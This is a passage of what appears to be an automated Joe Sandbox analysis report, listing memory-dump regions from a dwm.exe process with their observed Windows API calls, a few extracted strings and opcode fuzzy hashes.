                                                  • String ID:
                                                  • API String ID: 3168794593-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Free
                                                  • String ID:
                                                  • API String ID: 3168794593-0
                                                  APIs
                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000262F1CB28DF), ref: 00000262F1CB2A12
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: ConsoleMode
                                                  • String ID:
                                                  • API String ID: 4145635619-0
                                                  APIs
                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000262F1D128DF), ref: 00000262F1D12A12
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: ConsoleMode
                                                  • String ID:
                                                  • API String ID: 4145635619-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                  • String ID:
                                                  • API String ID: 2933794660-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                  • String ID:
                                                  • API String ID: 2933794660-0
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448872342.00000262F1D31000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D30000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d30000_dwm.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000003.1494451949.00000262F1EB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000262F1EB0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_3_262f1eb0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 3242871069-1018135373
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000003.1494451949.00000262F1EB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000262F1EB0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_3_262f1eb0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: CallTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3163161869-2084237596
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastWrite
                                                  • String ID: U
                                                  • API String ID: 442123175-4171548499
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastWrite
                                                  • String ID: U
                                                  • API String ID: 442123175-4171548499
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFileHeaderRaise
                                                  • String ID: csm
                                                  • API String ID: 2573137834-1018135373
                                                  • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                  • Instruction ID: 1315abed5f45fb5d346567c6d5517bcfb200c912c5e6d1cd3f492e82422f88ec
                                                  • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                  • Instruction Fuzzy Hash: B2115832215F9082EB618B25F428259B7F1F788B84F984224EF8D47BA9DF3DC955CB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFileHeaderRaise
                                                  • String ID: csm
                                                  • API String ID: 2573137834-1018135373
                                                  • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                  • Instruction ID: 56ae9dca0283ecd3853b444ed76c5aa75720ba9ac31bcefd39f9415ca68821c1
                                                  • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                                  • Instruction Fuzzy Hash: 41115832214F9482EB248B25F458249B7F5F788B88F984224EE8D07B68DF3DC555CB00
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID:
                                                  • API String ID: 756756679-0
                                                  • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                  • Instruction ID: f6524ad8902acd3490f1351edc8efdb5a53497a385106e658845b88c2dda419f
                                                  • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                  • Instruction Fuzzy Hash: 2D11AD31A01F90C1EB16DBA6A80C29967B0F788FC0F984034DE4E93BA5EF39C4468341
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID:
                                                  • API String ID: 756756679-0
                                                  • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                  • Instruction ID: 112342d7598463ab21077b981b0585c62388313cd7fa2dca443d2c3cd0195907
                                                  • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                                  • Instruction Fuzzy Hash: C0113931A01F94C5EA15DB6AA80C25977B4F789FD0F984128DE4E53B69EE39D4868700
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                  • Instruction ID: 077aeb5079f5f357adfd9e4c988a9f976cf0db9caba8f44bc9b2e4d6c9b544b2
                                                  • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                  • Instruction Fuzzy Hash: DCE06D31611A14DAE714CFA2D80C38936F1FB88F06F84C024C90947791EF7E849D8B41
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                  • Instruction ID: 10b629e55c2da844159781a16f778e7fc57757d9263313839a744a0187929370
                                                  • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                                  • Instruction Fuzzy Hash: 03E03231B01A18DAF7298B62E80C34936F1EB8EB05F888124C90907760EF7E84DD8B80
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3447566780.00000262F1CA1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1CA0000, based on PE: true
                                                  • Associated: 00000012.00000002.3447461846.00000262F1CA0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447674523.00000262F1CB5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447777990.00000262F1CC0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447881409.00000262F1CC2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3447984338.00000262F1CC9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1ca0000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                  • Instruction ID: aabc41e2585881794810aa1aff99d18bdc4fda7c78ffdf5e28400d38eda332ed
                                                  • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                  • Instruction Fuzzy Hash: C2E0ED71621914DAE719DBA2D80C29976B1FB88B16F848034C90947751EE39849D9A11
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448257654.00000262F1D01000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D00000, based on PE: true
                                                  • Associated: 00000012.00000002.3448137506.00000262F1D00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448432455.00000262F1D15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448513222.00000262F1D20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448655925.00000262F1D22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448714516.00000262F1D29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d00000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                  • Instruction ID: 553541f89a224aee690aa4df97bcb4b95e3b9889be9fe25ac11f6ed954b914f4
                                                  • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                  • Instruction Fuzzy Hash: C4E0E571711A18EAF72A9B62E80C25976B1FB8DB15F888164C90907B20EE3E84DD9B10
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000012.00000002.3448872342.00000262F1D31000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000262F1D30000, based on PE: true
                                                  • Associated: 00000012.00000002.3448816247.00000262F1D30000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3448971011.00000262F1D45000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3449077595.00000262F1D50000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3449181058.00000262F1D52000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000012.00000002.3449289748.00000262F1D59000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_18_2_262f1d30000_dwm.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                  • Instruction ID: 6f7cc1e419162efb08ca9a792295804387426de7163e8cc713263ddf515316d3
                                                  • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                                  • Instruction Fuzzy Hash: DCE0E571611A18EAE7289B62D90D25976B1FB88B55F888164C94907B20EE3A849D9B20